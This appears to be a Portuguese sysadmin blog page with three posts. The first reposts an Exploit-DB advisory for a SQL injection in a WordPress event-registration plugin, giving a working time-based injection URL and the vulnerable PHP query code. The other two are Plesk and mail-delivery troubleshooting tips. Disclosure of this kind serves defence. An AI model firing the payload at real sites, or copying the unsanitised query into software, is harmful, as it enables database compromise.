WordPress Event Registration plugin

Standard


# Exploit Title: WordPress Event Registration plugin < = 5.4.3 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip # Version: 5.4.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
$id= $_REQUEST['id'];
...
$sql = "SELECT * FROM " . $events_detail_tbl . " WHERE id='$id'";
$result = mysql_query($sql);

Fonte: http://www.exploit-db.com/exploits/17751/

Unable to load object of type Skin with id=8: Skin: unable to select: no such row in the table

Standard

Se você está recebendo a mensagem de erro:

Unable to load object of type Skin with id=8: Skin: unable to select: no such row in the table

Ao tentar logar-se no Parallels Plesk 10.x, nada de Pânico, provavelmente a saída ocorre pois a tabela com a Skin do plesk não foi atualizada corretamente.
Normalmente o id dela fica sendo 1, então se o painel (foi o caso do meu cliente) pedia 8 como id na tabela Skins, para corrigir basta fazer o seguinte:

Abra o MS-DOS e digite:

"%plesk_bin%\dbclient.exe" --direct-sql --sql="update Skins set id=8 where id=1"
Antes dê um select na tabela skins para saber se a Skin Default é realmente de id 1, caso seja diferente basta informar no where o id dela.
Espero a caixa de biz, please!

Servidor de email não envia para o Hotmail (postfix, sendmail, qmail ou exim)

Standard

Nem entre em pânico, você sabe que o mestre da cocada preta aqui está com a solução, e de fato é simples, acesse os links:

http://postmaster.live.com/FAQ.aspx

http://www.microsoft.com/mscorp/safe…d/default.mspx

Se após ajustes de SPF e MX perfeitamente configurados o serviço de email não enviar corretamente para hotmail, yahoo ou uol, veja isto aqui:

http://help.yahoo.com/help/us/mail/defer/defer-06.html

Nada de pânico, negócio é ver se há blacklist de spam, veja:

http://mxtoolbox.com/blacklists.aspx